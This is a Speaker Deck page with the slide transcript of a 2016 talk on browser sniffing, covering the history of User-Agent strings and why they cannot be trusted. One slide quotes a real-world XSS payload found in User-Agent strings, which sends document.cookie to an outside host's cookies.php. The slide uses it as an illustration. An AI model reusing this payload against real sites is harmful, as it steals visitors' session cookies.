$30 off During Our Annual Pro Sale. View Details »

Everybody lies @ NLHTML5

Niels Leenheer
March 17, 2016
Technology
0
160

Everybody lies @ NLHTML5

This is talk about browser sniffing. And yes, I do realise it is 2016. I know browser sniffing is ugly and we should all be using feature detection. But a quick search on Github still shows millions of lines of code referring to user agents strings. So this message clearly hasn’t landed yet. But why is browser sniffing a bad choice? This talk will dive into history and show the origin of the user agent string and the hidden battle between browser makers and web developers. It will show its simple beginnings and the horrible monstrosity it has become.

Niels Leenheer

March 17, 2016
Tweet

More Decks by Niels Leenheer

See All by Niels Leenheer
Fun with Bluetooth @ Frontend United
nielsleenheer
1
91
Fun with Bluetooth @ Amsterdam JSNation
nielsleenheer
1
120
Fun with Bluetooth @ JSConf Belgium
nielsleenheer
0
75
Fun with Bluetooth @ DevDays Vilnius
nielsleenheer
0
130
Fun with Bluetooth @ Universal JS Day
nielsleenheer
0
340
Fun with Bluetooth @ Amsterdam University of Applied Sciences
nielsleenheer
0
42
Fun with Bluetooth @ FrontendNE 2018
nielsleenheer
0
170
Fun with Bluetooth @ DevFestNL
nielsleenheer
0
130
Fun with Bluetooth @ Halfstack
nielsleenheer
0
87

Other Decks in Technology

See All in Technology
ExaDB-D dbaascli で出来ること
oracle4engineer
PRO
0
1.2k
Exploring Postgres VACUUM with the VACUUM Simulator
keiko713
5
660
ChatGPT for Developer - 超入門
dahatake
41
22k
つくばチャレンジ2023EX with PLATEAU@つくばセンター広場課題コース
tsukubachallenge
0
530
エンタープライズSaaSへの挑戦〜顧客の事業を成長させるプロダクトマネジメントとは?〜 / pmconf2023
route06
2
580
231116 あつまれ入力デバイスの沼 Ryu.Cyberさん
comucal
PRO
0
180
LangChainとフルサーバーレスですばやくセキュアなRAGアプリをつくるための実践解説/LangChain_Book
yoshidashingo
8
2.9k
CloudNative_TrailMap_Study#2_20231114
tkhresk
1
110
CI/CDプロセスの拡充からはじめる技術的負債の解消/Eliminate technical debt, starting with expanding CI/CD processes
onecareer_tech
0
210
リアルで価値を発揮するデジタルプロダクトを開発する
aki_iinuma
0
940
デザインシステム仕切り直し
chloe463
1
1.7k
コロプラ_SRE_LCE_ゲームバックエンド_性能との戦い
colopl
0
140

Featured

See All Featured
How to train your dragon (web standard)
notwaldorf
71
4.8k
Become a Pro
speakerdeck
PRO
8
3.6k
Designing Dashboards & Data Visualisations in Web Apps
destraynor
225
51k
Bash Introduction
62gerente
603
210k
How New CSS Is Changing Everything About Graphic Design on the Web
jensimmons
215
12k
KATA
mclloyd
13
11k
Typedesign – Prime Four
hannesfritz
35
1.8k
Fireside Chat
paigeccino
18
2.3k
What the flash - Photography Introduction
edds
64
11k
10 Git Anti Patterns You Should be Aware of
lemiorhan
644
57k
We Have a Design System, Now What?
morganepeng
41
6.4k
Building an army of robots
kneath
299
41k

Transcript

  1. everybody lies


    NLHTML5 @ Nerds & Company, March 17th 2016

    View Slide

  2. View Slide

  3. View Slide

  4. View Slide

  5. yes, this talk is about browser sniffing

    View Slide

  6. why a talk about
    browser sniffing?

    View Slide

  7. browser sniffing is 

    dirty

    View Slide

  8. you should use 

    feature detection

    View Slide

  9. why a talk about
    browser sniffing?

    View Slide

  10. View Slide

  11. what is browser sniffing?

    View Slide

  12. The HTTP specification defines
    the User-Agent header. 

    It contains a string with
    information about the browser.

    View Slide

  13. Every request the browser
    makes to the server includes
    the User-Agent header

    View Slide

  14. GET http://whichbrowser.net/ HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Accept-Language: en-us
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive
    Host: whichbrowser.net

    View Slide

  15. GET http://whichbrowser.net/ HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Accept-Language: en-us
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive
    Host: whichbrowser.net

    HTTP/1.1 200 OK
    Date: Mon, 08 Feb 2016 10:40:28 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16
    Last-Modified: Thu, 15 Jan 2015 10:10:40 GMT
    ETag: "984-50cae11796432"
    Accept-Ranges: bytes
    Content-Length: 2436
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8



    View Slide

  16. You can access 

    the exact same string 

    using JavaScript

    View Slide

  17. 
<br/><!--
<br/>
<br/>alert(navigator.userAgent);
<br/>
<br/>//-->
<br/>


    View Slide

  18. You can use the User-Agent
    string to identify:


    the browser

    the rendering engine

    the operating system

    the device model

    and more

    View Slide

  19. why browser sniffing is hard

    View Slide

  20. things started out simple

    View Slide

  21. Mosaic/1.0 (Win3.1)
    Mosaic
    The name of 

    the browser
    The version of

    the browser
    Operating 

    system

    View Slide

  22. Mozilla/1.0 (Win3.1)
    Netscape Navigator
    The code name of 

    the browser
    The version of

    the browser
    Operating 

    system

    View Slide

  23. but it quickly started 

    to get complicated

    View Slide

  24. Mozilla/1.0 (compatible; MSIE 1.0; Windows 95)
    Internet Explorer
    The name of 

    the browser
    The version of

    the browser
    Operating 

    system
    Compatible with 

    Netscape Navigator 1.0

    View Slide

  25. Opera/8.54 (Windows 95; U; en)
    Opera
    The name of 

    the browser
    The version of

    the browser
    Operating 

    system
    United States 

    level encryption
    English 

    language

    View Slide

  26. Opera/10.00 (Windows NT 5.1; U; en) Presto/2.2.0
    Opera
    The name of 

    the browser
    The version of

    the browser
    Rendering 

    engine

    View Slide

  27. Opera/9.8 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.10
    Opera
    The name of 

    the browser
    Fake version of

    the browser
    Real version of

    the browser

    View Slide

  28. Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.0.12) 

    Gecko/20090706 Firefox/3.0.12
    Firefox
    The name of 

    the browser
    Version of

    the browser
    The name of 

    the rendering engine
    Version of

    the rendering

    engine
    Build date of

    the rendering engine

    View Slide

  29. Mozilla/5.0 (Windows NT 6.0; rv:15.0) 

    Gecko/20100101 Firefox/15.0
    Firefox
    Build date is no longer

    updated

    View Slide

  30. Mozilla/5.0 (Windows NT 6.0; rv:16.0) 

    Gecko/16.0 Firefox/16.0
    Firefox

    View Slide

  31. and it gets worse…

    View Slide

  32. Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en)

    AppleWebKit/525.27.1 (KHTML, like Gecko)

    Version/3.2.3 Safari/525.28.3
    Safari
    The name of 

    the browser
    Version of

    the browser

    View Slide

  33. Mozilla/5.0 (Windows; U; Windows NT 6.0; en)

    AppleWebKit/525.27.1 (KHTML, like Gecko)

    Chrome/15.0.874.120 Safari/525.28.3
    Chrome
    The name of 

    the browser
    Version of

    the browser

    View Slide

  34. Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
    like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.180
    Opera
    The name of 

    the browser
    Version of

    the browser

    View Slide

  35. Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
    Version of

    the browser
    Internet Explorer

    View Slide

  36. Mozilla/5.0 (Windows NT 10.0)

    AppleWebKit/537.36 (KHTML, like Gecko)

    Chrome/42.0.2311.135 Safari/525.28.3 Edge/12.10162
    Edge
    The name of 

    the browser
    Version of

    the browser

    View Slide

  37. and those were all relatively
    normal User-Agent strings

    View Slide

  38. “User-Agent strings only get
    larger over time, never smaller”
    Niels’s second law of User-Agent strings

    View Slide

  39. Mozilla/5.0 (Linux; Android 4.3; en; SAMSUNG GT-I9505 Build/JSS15J)
    AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/
    28.0.1500.94 Mobile Safari/537.36
    Samsung Internet
    Version of the browser
    Samsung device

    View Slide

  40. Mozilla/5.0 (Series40; NOKIALumia800; 

    Profile/MIDP-2.1 Configuration/CLDC-1.1) 

    Gecko/20100401 S40OviBrowser/1.8.0.50.5
    Nokia Xpress for Windows Phone

    View Slide

  41. Mozilla/5.0 (X11; Linux; ko-KR) 

    AppleWebKit/534.26+ (KHTML, like Gecko) 

    Version/5.0 Safari/534.26+
    LG Netcast

    View Slide

  42. Sometimes browsers include a
    compatibility mode, or desktop
    mode which deliberately
    changes the User-Agent string

    View Slide

  43. Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50
    Opera
    The name of 

    the browser
    Version of

    the browser
    The name of the

    operating system

    View Slide

  44. Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50
    Opera Mobile (desktop mode)
    The name of 

    the browser
    Version of

    the browser
    ROT 13 encrypted

    “mobi“

    View Slide

  45. Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
    Internet Explorer
    Browser version

    View Slide

  46. Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
    Internet Explorer (compatibility view)
    Trident 5 means it’s 

    Internet Explorer 9

    View Slide

  47. And it is possible to change the
    User-Agent string yourself

    View Slide


  48. http://www.sexxlife.it/sexyshop (sexy shop - sexy toys, BDSM,
    vibratori, falli, vagine, lubrificanti, dvd porno, film hard,
    lingerie - Migliaia di articoli nel nostro sexy shop online.;
    http://www.sexxlife.it; [email protected])
    spam

    View Slide

  49. alert("My Little Pony”);
    document.location= 
<br/>"http://www.max1094.18.lc/admin/cookies.php?c=" +<br/>document.cookie;
    alt="My Little Pony”>
    XSS attacks

    View Slide

  50. XSS attacks

    View Slide



  51. Mozilla/10.0 (compatible; MSIE 10.0; CP/M; 8-bit)


    Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; 

    Microsoft; Surface Zune Phone XL) 

    AppleWebKit/537.36 (KHTML, like Gecko)


    (˽°□°҂˽Ɨ ˍʓˍ
    funny people

    View Slide

  52. angry people

    View Slide

  53. FuckZilla/666.0 (Gavnoid; Debile; rv:123.0) 

    FuckYou/123.0 FuckingFox/321.0


    Opera/9.80 (Windows NT 6.1; U; FuckYou; xx) 

    Presto/2.10.229 Version/11.62


    Seriously, Go fuck yourself


    W3C standards are important. 

    Stop fucking obsessing over user-agent already.
    angry people

    View Slide

  54. 1.000.000

    unique

    useragent
    strings
    82 x fuck
    10 x shit
    6 x ass
    9 x dick
    3 x vagina
    108 x sex
    4 x balls

    View Slide

  55. User-Agent strings 

    cannot be trusted!

    View Slide

  56. Everybody lies

    View Slide

  57. use browser sniffing for
    controlling access to 

    your website
    you should never

    View Slide

  58. use browser sniffing for
    determining browser
    capabilities
    you should never

    View Slide

  59. build your own 

    browser sniffing library

    you should never

    View Slide

  60. what is browser sniffing good for?

    View Slide

  61. improve ux


    if you know the platform or browser, 

    you can streamline the user experience

    View Slide

  62. View Slide

  63. analytics


    if you know your users, 

    you can build a better site for them

    View Slide

  64. error logging


    if you know which browser is causing
    problems, you can fix them

    View Slide

  65. View Slide

  66. View Slide

  67. View Slide

  68. Use a browser sniffing library that 

    is regularly updated. And check if 

    it is possible to automatically
    schedule updates.

    View Slide

  69. Try libraries like

    UAParser, 

    PiwikDeviceDetector 

    or WhichBrowser
    https:/
    /github.com/ua-parser

    https:/
    /github.com/piwik/device-detector

    https:/
    /github.com/whichbrowser

    View Slide

  70. Please don’t use WURLF because it 

    is outdated and just not good

    View Slide

  71. View Slide

  72. “If you tell a big enough lie 

    and tell it frequently enough, 

    it will be believed”
    — Ghandi

    View Slide

  73. “If you tell a big enough lie 

    and tell it frequently enough, 

    it will be believed”
    — Ghandi

    View Slide

  74. — Adolf Hitler
    “If you tell a big enough lie 

    and tell it frequently enough, 

    it will be believed”

    View Slide

  75. Thank you!

    View Slide

  76. Thank you!

    View Slide